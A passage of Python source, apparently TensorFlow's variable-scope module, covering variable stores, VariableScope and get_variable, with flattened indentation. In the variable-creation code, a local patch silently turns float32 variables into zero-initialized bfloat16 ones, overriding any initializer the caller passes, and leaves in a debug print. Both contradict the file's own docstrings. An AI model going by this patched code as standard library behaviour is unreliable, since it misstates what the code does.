shape = tensor_shape.as_shape(shape)
if name in self._vars:
# Here we handle the case when returning an existing variable.
if reuse is False:
tb = self._vars[name].op.traceback[::-1]
# Throw away internal tf entries and only take a few lines.
tb = [x for x in tb if "tensorflow/python" not in x[0]][:3]
raise ValueError("Variable %s already exists, disallowed."
" Did you mean to set reuse=True or "
"reuse=tf.AUTO_REUSE in VarScope? "
"Originally defined at:\n\n%s" % (
name, "".join(traceback.format_list(tb))))
found_var = self._vars[name]
if not shape.is_compatible_with(found_var.get_shape()):
raise ValueError("Trying to share variable %s, but specified shape %s"
" and found shape %s." % (name, shape,
found_var.get_shape()))
if not dtype.is_compatible_with(found_var.dtype):
dtype_str = dtype.name
found_type_str = found_var.dtype.name
raise ValueError("Trying to share variable %s, but specified dtype %s"
" and found dtype %s." % (name, dtype_str,
found_type_str))
return found_var
# The code below handles only the case of creating a new variable.
if reuse is True:
raise ValueError("Variable %s does not exist, or was not created with "
"tf.get_variable(). Did you mean to set "
"reuse=tf.AUTO_REUSE in VarScope?" % name)
if not shape.is_fully_defined() and not initializing_from_value:
raise ValueError("Shape of a new variable (%s) must be fully defined, "
"but instead was %s." % (name, shape))
# Create the tensor to initialize the variable with default value.
if initializer is None:
initializer, initializing_from_value = self._get_default_initializer(
name=name, shape=shape, dtype=dtype)
# Enter an init scope when creating the initializer.
with ops.init_scope():
if initializing_from_value:
init_val = initializer
variable_dtype = None
else:
# Instantiate initializer if provided initializer is a type object.
if isinstance(initializer, type(init_ops.Initializer)):
initializer = initializer(dtype=dtype)
init_val = lambda: initializer( # pylint: disable=g-long-lambda
shape.as_list(), dtype=dtype, partition_info=partition_info)
variable_dtype = dtype.base_dtype
# Create the variable.
if use_resource is None:
# Set the default value if unspecified.
use_resource = False
if variable_dtype is dtypes.float32:
variable_dtype = dtypes.bfloat16
initializer = BF16Zeros()
#init_val = math_ops.to_bfloat16(array_ops.zeros(shape, dtypes.float32))
init_val = lambda: initializer(shape.as_list(), dtype=dtypes.float32, partition_info=partition_info)
v = variable(
initial_value=init_val,
name=name,
trainable=trainable,
collections=collections,
caching_device=caching_device,
dtype=variable_dtype,
validate_shape=validate_shape,
constraint=constraint,
use_resource=use_resource)
if not context.executing_eagerly() or self._store_eager_variables:
# In eager mode we do not want to keep default references to Variable
# objects as this will prevent their memory from being released.
self._vars[name] = v
logging.vlog(1, "Created variable %s with shape %s and init %s", v.name,
format(shape), initializer)
# Run the regularizer if requested and save the resulting loss.
if regularizer:
with ops.colocate_with(v):
with ops.name_scope(name + "/Regularizer/"):
loss = regularizer(v)
if loss is not None:
if context.executing_eagerly():
v_name = "v_%s" % type(v)
loss_name = "loss_%s" % type(loss)
else:
v_name = v.name
loss_name = loss.name
logging.vlog(1, "Applied regularizer to %s and added the result %s "
"to REGULARIZATION_LOSSES.", v_name, loss_name)
ops.add_to_collection(ops.GraphKeys.REGULARIZATION_LOSSES, loss)
if variable_dtype is dtypes.bfloat16:
print(name)
return math_ops.to_float(v)
return v
# Initialize variable when no initializer provided
def _get_default_initializer(self, name, shape=None, dtype=dtypes.float32):
"""Provide a default initializer and a corresponding value.
Args:
name: see get_variable.
shape: see get_variable.
dtype: see get_variable.
Returns:
initializer and initializing_from_value. See get_variable above.
Raises:
ValueError: When giving unsupported dtype.
"""
del shape
# If dtype is DT_FLOAT, provide a uniform unit scaling initializer
if dtype.is_floating:
initializer = init_ops.glorot_uniform_initializer()
initializing_from_value = False
# If dtype is DT_INT/DT_UINT, provide a default value `zero`
# If dtype is DT_BOOL, provide a default value `FALSE`
elif (dtype.is_integer or dtype.is_unsigned or dtype.is_bool
or dtype == dtypes.string):
initializer = init_ops.zeros_initializer()
initializing_from_value = False
# NOTES:Do we need to support for handling DT_STRING and DT_COMPLEX here?
else:
raise ValueError("An initializer for variable %s of %s is required"
% (name, dtype.base_dtype))
return initializer, initializing_from_value
# To stop regularization, use this regularizer
@tf_export("no_regularizer")
def no_regularizer(_):
"""Use this function to prevent regularization of variables."""
return None
# TODO(alive): support caching devices and partitioned variables in Eager mode.
@tf_export("VariableScope")
class VariableScope(object):
"""Variable scope object to carry defaults to provide to `get_variable`.
Many of the arguments we need for `get_variable` in a variable store are most
easily handled with a context. This object is used for the defaults.
Attributes:
name: name of the current scope, used as prefix in get_variable.
initializer: default initializer passed to get_variable.
regularizer: default regularizer passed to get_variable.
reuse: Boolean, None, or tf.AUTO_REUSE, setting the reuse in
get_variable. When eager execution is enabled this argument is always
forced to be False.
caching_device: string, callable, or None: the caching device passed to
get_variable.
partitioner: callable or `None`: the partitioner passed to `get_variable`.
custom_getter: default custom getter passed to get_variable.
name_scope: The name passed to `tf.name_scope`.
dtype: default type passed to get_variable (defaults to DT_FLOAT).
use_resource: if False, create a normal Variable; if True create an
experimental ResourceVariable with well-defined semantics. Defaults
to False (will later change to True). When eager execution is enabled
this argument is always forced to be True.
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value
(which must have the same shape). Constraints are not safe to
use when doing asynchronous distributed training.
"""
def __init__(self,
reuse,
name="",
initializer=None,
regularizer=None,
caching_device=None,
partitioner=None,
custom_getter=None,
name_scope="",
dtype=dtypes.float32,
use_resource=None,
constraint=None):
"""Creates a new VariableScope with the given properties."""
self._name = name
self._initializer = initializer
self._regularizer = regularizer
self._reuse = reuse
self._caching_device = caching_device
self._partitioner = partitioner
self._custom_getter = custom_getter
self._name_scope = name_scope
self._dtype = dtype
self._use_resource = use_resource
self._constraint = constraint
if context.executing_eagerly():
if self._caching_device is not None:
raise NotImplementedError("Caching devices is not yet supported "
"when eager execution is enabled.")
if self._partitioner is not None:
raise NotImplementedError("Partitioned variables are not yet supported "
"when eager execution is enabled.")
self._reuse = AUTO_REUSE
self._use_resource = True
@property
def name(self):
return self._name
@property
def original_name_scope(self):
return self._name_scope
@property
def reuse(self):
return self._reuse
@property
def initializer(self):
return self._initializer
@property
def dtype(self):
return self._dtype
@property
def use_resource(self):
return self._use_resource
@property
def regularizer(self):
return self._regularizer
@property
def caching_device(self):
return self._caching_device
@property
def partitioner(self):
return self._partitioner
@property
def custom_getter(self):
return self._custom_getter
@property
def constraint(self):
return self._constraint
def reuse_variables(self):
"""Reuse variables in this scope."""
self._reuse = True
def set_initializer(self, initializer):
"""Set initializer for this scope."""
self._initializer = initializer
def set_dtype(self, dtype):
"""Set data type for this scope."""
self._dtype = dtype
def set_use_resource(self, use_resource):
"""Sets whether to use ResourceVariables for this scope."""
if context.executing_eagerly() and not use_resource:
raise ValueError("When eager execution is enabled, "
"use_resource cannot be set to false.")
self._use_resource = use_resource
def set_regularizer(self, regularizer):
"""Set regularizer for this scope."""
self._regularizer = regularizer
def set_caching_device(self, caching_device):
"""Set caching_device for this scope."""
if context.executing_eagerly():
raise NotImplementedError("Caching devices are not yet supported "
"when eager execution is enabled.")
self._caching_device = caching_device
def set_partitioner(self, partitioner):
"""Set partitioner for this scope."""
if partitioner and context.executing_eagerly():
raise NotImplementedError("Partitioned variables are not yet supported "
"when eager execution is enabled.")
self._partitioner = partitioner
def set_custom_getter(self, custom_getter):
"""Set custom getter for this scope."""
self._custom_getter = custom_getter
def get_collection(self, name):
"""Get this scope's variables."""
scope = self._name + "/" if self._name else ""
return ops.get_collection(name, scope)
def trainable_variables(self):
"""Get this scope's trainable variables."""
return self.get_collection(ops.GraphKeys.TRAINABLE_VARIABLES)
def global_variables(self):
"""Get this scope's global variables."""
return self.get_collection(ops.GraphKeys.GLOBAL_VARIABLES)
def local_variables(self):
"""Get this scope's local variables."""
return self.get_collection(ops.GraphKeys.LOCAL_VARIABLES)
def get_variable(self,
var_store,
name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
reuse=None,
trainable=True,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
custom_getter=None,
constraint=None):
"""Gets an existing variable with this name or create a new one."""
if regularizer is None:
regularizer = self._regularizer
if caching_device is None:
caching_device = self._caching_device
if partitioner is None:
partitioner = self._partitioner
if custom_getter is None:
custom_getter = self._custom_getter
if context.executing_eagerly():
reuse = False
use_resource = True
else:
if reuse is None:
reuse = self._reuse
if use_resource is None:
use_resource = self._use_resource
full_name = self.name + "/" + name if self.name else name
# Variable names only depend on variable_scope (full_name here),
# not name_scope, so we reset it below for the time of variable creation.
with ops.name_scope(None):
# Check that `initializer` dtype and `dtype` are consistent before
# replacing them with defaults.
if (dtype is not None and initializer is not None and
not callable(initializer)):
init_dtype = ops.convert_to_tensor(initializer).dtype.base_dtype
if init_dtype != dtype:
raise ValueError("Initializer type '%s' and explicit dtype '%s' "
"don't match." % (init_dtype, dtype))
if initializer is None:
initializer = self._initializer
if constraint is None:
constraint = self._constraint
if dtype is None:
dtype = self._dtype
return var_store.get_variable(
full_name, shape=shape, dtype=dtype, initializer=initializer,
regularizer=regularizer, reuse=reuse, trainable=trainable,
collections=collections, caching_device=caching_device,
partitioner=partitioner, validate_shape=validate_shape,
use_resource=use_resource, custom_getter=custom_getter,
constraint=constraint)
def _get_partitioned_variable(self,
var_store,
name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
trainable=True,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
constraint=None):
"""Gets an existing variable with this name or create a new one."""
if context.executing_eagerly():
raise NotImplementedError("Partitioned variables are not yet supported "
"when eager execution is enabled.")
if initializer is None:
initializer = self._initializer
if regularizer is None:
regularizer = self._regularizer
if constraint is None:
constraint = self._constraint
if caching_device is None:
caching_device = self._caching_device
if partitioner is None:
partitioner = self._partitioner
if dtype is None:
dtype = self._dtype
if use_resource is None:
use_resource = self._use_resource
if self._custom_getter is not None:
raise ValueError(
"Private access to _get_partitioned_variable is not allowed when "
"a custom getter is set. Current custom getter: %s. "
"It is likely that you're using create_partitioned_variables. "
"If so, consider instead using get_variable with a non-empty "
"partitioner parameter instead." % self._custom_getter)
if partitioner is None:
raise ValueError("No partitioner was specified")
# This allows the variable scope name to be used as the variable name if
# this function is invoked with an empty name arg, for backward
# compatibility with create_partitioned_variables().
full_name_list = []
if self.name:
full_name_list.append(self.name)
if name:
full_name_list.append(name)
full_name = "/".join(full_name_list)
# Variable names only depend on variable_scope (full_name here),
# not name_scope, so we reset it below for the time of variable creation.
with ops.name_scope(None):
# pylint: disable=protected-access
return var_store._get_partitioned_variable(
full_name, shape=shape, dtype=dtype, initializer=initializer,
regularizer=regularizer, reuse=self.reuse, trainable=trainable,
collections=collections, caching_device=caching_device,
partitioner=partitioner, validate_shape=validate_shape,
use_resource=use_resource, constraint=constraint)
# pylint: enable=protected-access
_VARSTORE_KEY = ("__variable_store",)
_VARSCOPESTORE_KEY = ("__varscope",)
class _VariableScopeStore(threading.local):
"""A thread local store for the current variable scope and scope counts."""
def __init__(self):
super(_VariableScopeStore, self).__init__()
self.current_scope = VariableScope(False)
self.variable_scopes_count = {}
def open_variable_scope(self, scope_name):
if scope_name in self.variable_scopes_count:
self.variable_scopes_count[scope_name] += 1
else:
self.variable_scopes_count[scope_name] = 1
def close_variable_subscopes(self, scope_name):
for k in list(self.variable_scopes_count.keys()):
if scope_name is None or k.startswith(scope_name + "/"):
self.variable_scopes_count[k] = 0
def variable_scope_count(self, scope_name):
return self.variable_scopes_count.get(scope_name, 0)
def get_variable_scope_store():
"""Returns the variable scope store for current thread."""
scope_store = ops.get_collection(_VARSCOPESTORE_KEY)
if not scope_store:
scope_store = _VariableScopeStore()
ops.add_to_collection(_VARSCOPESTORE_KEY, scope_store)
else:
scope_store = scope_store[0]
return scope_store
@tf_export("get_variable_scope")
def get_variable_scope():
"""Returns the current variable scope."""
return get_variable_scope_store().current_scope
def _get_default_variable_store():
store = ops.get_collection(_VARSTORE_KEY)
if store:
return store[0]
store = _VariableStore()
ops.add_to_collection(_VARSTORE_KEY, store)
return store
@tf_contextlib.contextmanager
def with_variable_store(store):
store_collection = ops.get_collection_ref(_VARSTORE_KEY)
old = list(store_collection)
store_collection[:] = [store]
try:
yield
finally:
store_collection[:] = old
class EagerVariableStore(object):
"""Wrapper allowing functional layers to be used with eager execution.
When eager execution is enabled Variables get deleted when they go out of
scope, and are not stored in global collections by default. A lot of code
(mostly the functional layers in tf.layers) assumes that variables are kept in
a global list.
EagerVariableStore can be used in conjunction with this code to make it
eager-friendly. For example, to create a dense layer, use:
```
container = tfe.EagerVariableStore()
for input in dataset_iterator:
with container.as_default():
x = tf.layers.dense(input, name="l1")
print(container.variables) # Should print the variables used in the layer.
```
"""
def __init__(self, store=None):
if store is not None:
if not store._store_eager_variables: # pylint: disable=protected-access
raise ValueError("Cannot construct EagerVariableStore from a "
"VariableStore object that does not hold eager "
"variables.")
self._store = store
else:
self._store = _VariableStore()
self._store._store_eager_variables = True # pylint: disable=protected-access
def as_default(self):
return with_variable_store(self._store)
def variables(self):
return sorted(self._store._vars.values(), key=lambda x: x.name) # pylint: disable=protected-access
def trainable_variables(self):
# pylint: disable=protected-access
return sorted([x for x in self._store._vars.values() if x.trainable],
key=lambda x: x.name)
# pylint: enable=protected-access
def non_trainable_variables(self):
# pylint: disable=protected-access
return sorted([x for x in self._store._vars.values() if not x.trainable],
key=lambda x: x.name)
# pylint: enable=protected-access
def copy(self):
"""Copy this variable store and all of its contents.
Variables contained in this store will be copied over to the new variable
store, meaning that they can be modified without affecting the variables in
this store.
Returns:
A new EagerVariableStore instance containing copied variables.
"""
# pylint: disable=protected-access
new_store = EagerVariableStore()
for key, var in iteritems(self._store._vars):
# Strip device out of variable name.
try:
index = var.name.index(":")
except ValueError:
stripped_var_name = var.name
else:
stripped_var_name = var.name[:index]
# Create new variable with same value, name, and "trainable" flag.
new_var = resource_variable_ops.ResourceVariable(
var.read_value(),
name=stripped_var_name,
trainable=var.trainable)
new_store._store._vars[key] = new_var
return new_store
# pylint: enable=protected-access
# The argument list for get_variable must match arguments to get_local_variable.
# So, if you are updating the arguments, also update arguments to
# get_local_variable below.
@tf_export("get_variable")
def get_variable(name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
trainable=True,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
custom_getter=None,
constraint=None):
return get_variable_scope().get_variable(
_get_default_variable_store(), name, shape=shape, dtype=dtype,
initializer=initializer, regularizer=regularizer, trainable=trainable,
collections=collections, caching_device=caching_device,
partitioner=partitioner, validate_shape=validate_shape,
use_resource=use_resource, custom_getter=custom_getter,
constraint=constraint)
get_variable_or_local_docstring = (
"""%s
%sThis function prefixes the name with the current variable scope
and performs reuse checks. See the
@{$variables$Variable Scope How To}
for an extensive description of how reusing works. Here is a basic example:
```python
def foo():
with tf.variable_scope("foo", reuse=tf.AUTO_REUSE):
v = tf.get_variable("v", [1])
return v
v1 = foo() # Creates v.
v2 = foo() # Gets the same, existing v.
assert v1 == v2
```
If initializer is `None` (the default), the default initializer passed in
the variable scope will be used. If that one is `None` too, a
`glorot_uniform_initializer` will be used. The initializer can also be
a Tensor, in which case the variable is initialized to this value and shape.
Similarly, if the regularizer is `None` (the default), the default regularizer
passed in the variable scope will be used (if that is `None` too,
then by default no regularization is performed).
If a partitioner is provided, a `PartitionedVariable` is returned.
Accessing this object as a `Tensor` returns the shards concatenated along
the partition axis.
Some useful partitioners are available. See, e.g.,
`variable_axis_size_partitioner` and `min_max_variable_partitioner`.
Args:
name: The name of the new or existing variable.
shape: Shape of the new or existing variable.
dtype: Type of the new or existing variable (defaults to `DT_FLOAT`).
initializer: Initializer for the variable if one is created. Can either be
an initializer object or a Tensor. If it's a Tensor, its shape must be known
unless validate_shape is False.
regularizer: A (Tensor -> Tensor or None) function; the result of
applying it on a newly created variable will be added to the collection
@{tf.GraphKeys.REGULARIZATION_LOSSES} and can be used for regularization.
%scollections: List of graph collections keys to add the Variable to.
Defaults to `[%s]` (see `tf.Variable`).
caching_device: Optional device string or function describing where the
Variable should be cached for reading. Defaults to the Variable's
device. If not `None`, caches on another device. Typical use is to
cache on the device where the Ops using the Variable reside, to
deduplicate copying through `Switch` and other conditional statements.
partitioner: Optional callable that accepts a fully defined `TensorShape`
and `dtype` of the Variable to be created, and returns a list of
partitions for each axis (currently only one axis can be partitioned).
validate_shape: If False, allows the variable to be initialized with a
value of unknown shape. If True, the default, the shape of initial_value
must be known. For this to be used the initializer must be a Tensor and
not an initializer object.
use_resource: If False, creates a regular Variable. If true, creates an
experimental ResourceVariable instead with well-defined semantics.
Defaults to False (will later change to True). When eager execution is
enabled this argument is always forced to be True.
custom_getter: Callable that takes as a first argument the true getter, and
allows overwriting the internal get_variable method.
The signature of `custom_getter` should match that of this method,
but the most future-proof version will allow for changes:
`def custom_getter(getter, *args, **kwargs)`. Direct access to
all `get_variable` parameters is also allowed:
`def custom_getter(getter, name, *args, **kwargs)`. A simple identity
custom getter that simply creates variables with modified names is:
```python
def custom_getter(getter, name, *args, **kwargs):
return getter(name + '_suffix', *args, **kwargs)
```
Returns:
The created or existing `Variable` (or `PartitionedVariable`, if a
partitioner was used).
Raises:
ValueError: when creating a new variable and shape is not declared,
when violating reuse during variable creation, or when `initializer` dtype
and `dtype` don't match. Reuse is set inside `variable_scope`.
""")
get_variable.__doc__ = get_variable_or_local_docstring % (
"Gets an existing variable with these parameters or create a new one.",
"",
"trainable: If `True` also add the variable to the graph collection\n"
" `GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).\n ",
"GraphKeys.GLOBAL_VARIABLES")
# The argument list for get_local_variable must match arguments to get_variable.
# So, if you are updating the arguments, also update arguments to get_variable.
@tf_export("get_local_variable")
def get_local_variable(name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
trainable=False, # pylint: disable=unused-argument
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
custom_getter=None,
constraint=None):
if collections:
collections += [ops.GraphKeys.LOCAL_VARIABLES]
else:
collections = [ops.GraphKeys.LOCAL_VARIABLES]
return get_variable(
name, shape=shape, dtype=dtype, initializer=initializer,
regularizer=regularizer, trainable=False, collections=collections,
caching_device=caching_device, partitioner=partitioner,
validate_shape=validate_shape, use_resource=use_resource,
custom_getter=custom_getter, constraint=constraint)
get_local_variable.__doc__ = get_variable_or_local_docstring % (
"Gets an existing *local* variable or creates a new one.",
"Behavior is the same as in `get_variable`, except that variables are\n"
"added to the `LOCAL_VARIABLES` collection and `trainable` is set to\n"
"`False`.\n",
"",
"GraphKeys.LOCAL_VARIABLES")
def _get_partitioned_variable(name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
trainable=True,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
constraint=None):
"""Gets or creates a sharded variable list with these parameters.
The `partitioner` must be a callable that accepts a fully defined
`TensorShape` and returns a sequence of integers (the `partitions`).
These integers describe how to partition the given sharded `Variable`
along the given dimension. That is, `partitions[1] = 3` means split
the `Variable` into 3 shards along dimension 1. Currently, sharding along
only one axis is supported.
If the list of variables with the given name (prefix) is already stored,
we return the stored variables. Otherwise, we create a new one.
If initializer is `None` (the default), the default initializer passed in
the constructor is used. If that one is `None` too, we use a new
`glorot_uniform_initializer`. If initializer is a Tensor, we use
it as a value and derive the shape from the initializer.
If the initializer is a callable, then it will be called for each
shard. Otherwise the initializer should match the shape of the entire
sharded Variable, and it will be sliced accordingly for each shard.
Some useful partitioners are available. See, e.g.,
`variable_axis_size_partitioner` and `min_max_variable_partitioner`.
Args:
name: The name of the new or existing variable.
shape: Shape of the new or existing variable.
dtype: Type of the new or existing variable (defaults to `DT_FLOAT`).
initializer: Initializer for the variable if one is created.
regularizer: A (Tensor -> Tensor or None) function; the result of
applying it on a newly created variable will be added to the collection
GraphKeys.REGULARIZATION_LOSSES and can be used for regularization.
trainable: If `True` also add the variable to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).
collections: List of graph collections keys to add the Variable to.
Defaults to `[GraphKeys.GLOBAL_VARIABLES]` (see `tf.Variable`).
caching_device: Optional device string or function describing where the
Variable should be cached for reading. Defaults to the Variable's
device. If not `None`, caches on another device. Typical use is to
cache on the device where the Ops using the Variable reside, to
deduplicate copying through `Switch` and other conditional statements.
partitioner: Optional callable that accepts a fully defined `TensorShape`
and `dtype` of the Variable to be created, and returns a list of
partitions for each axis (currently only one axis can be partitioned).
validate_shape: If False, allows the variable to be initialized with a
value of unknown shape. If True, the default, the shape of initial_value
must be known.
use_resource: If False, creates a regular Variable. If True, creates an
experimental ResourceVariable instead which has well-defined semantics.
Defaults to False (will later change to True).
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value
(which must have the same shape). Constraints are not safe to
use when doing asynchronous distributed training.
Returns:
A tuple `(shards, partitions)` where `shards` is the list of `Variable`
shards and `partitions` is the output of the partitioner on the input
shape.
Raises:
ValueError: when creating a new variable and shape is not declared,
or when violating reuse during variable creation. Reuse is set inside
`variable_scope`.
"""
# pylint: disable=protected-access
scope = get_variable_scope()
if scope.custom_getter is not None:
raise ValueError(
"Private access to _get_partitioned_variable is not allowed when "
"a custom getter is set. Current custom getter: %s. "
"It is likely that you're using create_partitioned_variables. "
"If so, consider instead using get_variable with a non-empty "
"partitioner parameter instead." % scope.custom_getter)
return scope._get_partitioned_variable(
_get_default_variable_store(), name, shape=shape, dtype=dtype,
initializer=initializer, regularizer=regularizer, trainable=trainable,
collections=collections, caching_device=caching_device,
partitioner=partitioner, validate_shape=validate_shape,
use_resource=use_resource, constraint=constraint)
# pylint: enable=protected-access
# Named like a function for compatibility with the previous
# @tf_contextlib.contextmanager definition.
class _pure_variable_scope(object): # pylint: disable=invalid-name
"""A context for the variable_scope, see `variable_scope` for docs."""
def __init__(self,
name_or_scope,
reuse=None,
initializer=None,
regularizer=None,
caching_device=None,
partitioner=None,
custom_getter=None,
old_name_scope=None,
dtype=dtypes.float32,
use_resource=None,
constraint=None):
"""Creates a context for the variable_scope, see `variable_scope` for docs.
Note: this does not create a name scope.
Args:
name_or_scope: `string` or `VariableScope`: the scope to open.
reuse: `True` or None, or tf.AUTO_REUSE; if `None`, we inherit the parent
scope's reuse flag.
initializer: default initializer for variables within this scope.
regularizer: default regularizer for variables within this scope.
caching_device: default caching device for variables within this scope.
partitioner: default partitioner for variables within this scope.
custom_getter: default custom getter for variables within this scope.
old_name_scope: the original name scope when re-entering a variable scope.
dtype: type of the variables within this scope (defaults to `DT_FLOAT`).
use_resource: If False, variables in this scope will be regular Variables.
If True, experimental ResourceVariables will be creates instead, with
well-defined semantics. Defaults to False (will later change to True).
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value
(which must have the same shape). Constraints are not safe to
use when doing asynchronous distributed training.
"""
self._name_or_scope = name_or_scope
self._reuse = reuse
self._initializer = initializer
self._regularizer = regularizer
self._caching_device = caching_device
self._partitioner = partitioner
self._custom_getter = custom_getter
self._old_name_scope = old_name_scope
self._dtype = dtype
self._use_resource = use_resource
self._constraint = constraint
self._var_store = _get_default_variable_store()
self._var_scope_store = get_variable_scope_store()
if isinstance(self._name_or_scope, VariableScope):
self._new_name = self._name_or_scope.name
name_scope = self._name_or_scope._name_scope # pylint: disable=protected-access
# Handler for the case when we jump to a shared scope. We create a new
# VariableScope (self._var_scope_object) that contains a copy of the
# provided shared scope, possibly with changed reuse and initializer, if
# the user requested this.
variable_scope_object = VariableScope(
self._name_or_scope.reuse if not self._reuse else self._reuse,
name=self._new_name,
initializer=self._name_or_scope.initializer,
regularizer=self._name_or_scope.regularizer,
caching_device=self._name_or_scope.caching_device,
partitioner=self._name_or_scope.partitioner,
dtype=self._name_or_scope.dtype,
custom_getter=self._name_or_scope.custom_getter,
name_scope=name_scope,
use_resource=self._name_or_scope.use_resource,
constraint=self._constraint)
if self._initializer is not None:
variable_scope_object.set_initializer(self._initializer)
if self._regularizer is not None:
variable_scope_object.set_regularizer(self._regularizer)
if self._caching_device is not None:
variable_scope_object.set_caching_device(self._caching_device)
if self._partitioner is not None:
variable_scope_object.set_partitioner(self._partitioner)
if self._custom_getter is not None:
variable_scope_object.set_custom_getter(
_maybe_wrap_custom_getter(
self._custom_getter, self._name_or_scope.custom_getter))
if self._dtype is not None:
variable_scope_object.set_dtype(self._dtype)
if self._use_resource is not None:
variable_scope_object.set_use_resource(self._use_resource)
self._cached_variable_scope_object = variable_scope_object
def __enter__(self):
"""Begins the scope block.
Returns:
A VariableScope.
Raises:
ValueError: when trying to reuse within a create scope, or create within
a reuse scope, or if reuse is not `None` or `True`.
TypeError: when the types of some arguments are not appropriate.
"""
self._old = self._var_scope_store.current_scope
if isinstance(self._name_or_scope, VariableScope):
self._var_scope_store.open_variable_scope(self._new_name)
self._old_subscopes = copy.copy(
self._var_scope_store.variable_scopes_count)
variable_scope_object = self._cached_variable_scope_object
else:
# Handler for the case when we just prolong current variable scope.
# VariableScope with name extended by the provided one, and inherited
# reuse and initializer (except if the user provided values to set).
self._new_name = (
self._old.name + "/" + self._name_or_scope if self._old.name
else self._name_or_scope)
self._reuse = (self._reuse
or self._old.reuse) # Re-using is inherited by sub-scopes.
if self._old_name_scope is None:
name_scope = self._name_or_scope
else:
name_scope = self._old_name_scope
variable_scope_object = VariableScope(
self._reuse,
name=self._new_name,
initializer=self._old.initializer,
regularizer=self._old.regularizer,
caching_device=self._old.caching_device,
partitioner=self._old.partitioner,
dtype=self._old.dtype,
use_resource=self._old.use_resource,
custom_getter=self._old.custom_getter,
name_scope=name_scope,
constraint=self._constraint)
if self._initializer is not None:
variable_scope_object.set_initializer(self._initializer)
if self._regularizer is not None:
variable_scope_object.set_regularizer(self._regularizer)
if self._caching_device is not None:
variable_scope_object.set_caching_device(self._caching_device)
if self._partitioner is not None:
variable_scope_object.set_partitioner(self._partitioner)
if self._custom_getter is not None:
variable_scope_object.set_custom_getter(
_maybe_wrap_custom_getter(self._custom_getter,
self._old.custom_getter))
if self._dtype is not None:
variable_scope_object.set_dtype(self._dtype)
if self._use_resource is not None:
variable_scope_object.set_use_resource(self._use_resource)
self._var_scope_store.open_variable_scope(self._new_name)
self._var_scope_store.current_scope = variable_scope_object
return variable_scope_object
def __exit__(self, type_arg, value_arg, traceback_arg):
# If jumping out from a non-prolonged scope, restore counts.
if isinstance(self._name_or_scope, VariableScope):
self._var_scope_store.variable_scopes_count = self._old_subscopes
else:
self._var_scope_store.close_variable_subscopes(self._new_name)
self._var_scope_store.current_scope = self._old
def _maybe_wrap_custom_getter(custom_getter, old_getter):
"""Wrap a call to a custom_getter to use the old_getter internally."""
if old_getter is None:
return custom_getter
# The new custom_getter should call the old one
def wrapped_custom_getter(getter, *args, **kwargs):
# Call:
# custom_getter(
# lambda: old_getter(true_getter, ...), *args, **kwargs)
# which means custom_getter will call old_getter, which
# will call the true_getter, perform any intermediate
# processing, and return the results to the current
# getter, which will also perform additional processing.
return custom_getter(
functools.partial(old_getter, getter),
*args, **kwargs)
return wrapped_custom_getter
def _get_unique_variable_scope(prefix):
"""Get a name with the given prefix unique in the current variable scope."""
var_scope_store = get_variable_scope_store()
current_scope = get_variable_scope()
name = current_scope.name + "/" + prefix if current_scope.name else prefix
if var_scope_store.variable_scope_count(name) == 0:
return prefix
idx = 1
while var_scope_store.variable_scope_count(name + ("_%d" % idx)) > 0:
idx += 1
return prefix + ("_%d" % idx)
# Named like a function for backwards compatibility with the
# @tf_contextlib.contextmanager version, which was switched to a class to avoid
# some object creation overhead.
@tf_export("variable_scope") # pylint: disable=invalid-name
class variable_scope(object):
"""A context manager for defining ops that creates variables (layers).
This context manager validates that the (optional) `values` are from the same
graph, ensures that graph is the default graph, and pushes a name scope and a
variable scope.
If `name_or_scope` is not None, it is used as is. If `name_or_scope` is None,
then `default_name` is used. In that case, if the same name has been
previously used in the same scope, it will be made unique by appending `_N`
to it.
Variable scope allows you to create new variables and to share already created
ones while providing checks to not create or share by accident. For details,
see the @{$variables$Variable Scope How To}, here we present only a few basic
examples.
Simple example of how to create a new variable:
```python
with tf.variable_scope("foo"):
with tf.variable_scope("bar"):
v = tf.get_variable("v", [1])
assert v.name == "foo/bar/v:0"
```
Basic example of sharing a variable AUTO_REUSE:
```python
def foo():
with tf.variable_scope("foo", reuse=tf.AUTO_REUSE):
v = tf.get_variable("v", [1])
return v
v1 = foo() # Creates v.
v2 = foo() # Gets the same, existing v.
assert v1 == v2
```
Basic example of sharing a variable with reuse=True:
```python
with tf.variable_scope("foo"):
v = tf.get_variable("v", [1])
with tf.variable_scope("foo", reuse=True):
v1 = tf.get_variable("v", [1])
assert v1 == v
```
Sharing a variable by capturing a scope and setting reuse:
```python
with tf.variable_scope("foo") as scope:
v = tf.get_variable("v", [1])
scope.reuse_variables()
v1 = tf.get_variable("v", [1])
assert v1 == v
```
To prevent accidental sharing of variables, we raise an exception when getting
an existing variable in a non-reusing scope.
```python
with tf.variable_scope("foo"):
v = tf.get_variable("v", [1])
v1 = tf.get_variable("v", [1])
# Raises ValueError("... v already exists ...").
```
Similarly, we raise an exception when trying to get a variable that does not
exist in reuse mode.
```python
with tf.variable_scope("foo", reuse=True):
v = tf.get_variable("v", [1])
# Raises ValueError("... v does not exists ...").
```
Note that the `reuse` flag is inherited: if we open a reusing scope, then all
its sub-scopes become reusing as well.
A note about name scoping: Setting `reuse` does not impact the naming of other
ops such as mult. See related discussion on
[github#6189](https://github.com/tensorflow/tensorflow/issues/6189)
Note that up to and including version 1.0, it was allowed (though explicitly
discouraged) to pass False to the reuse argument, yielding undocumented
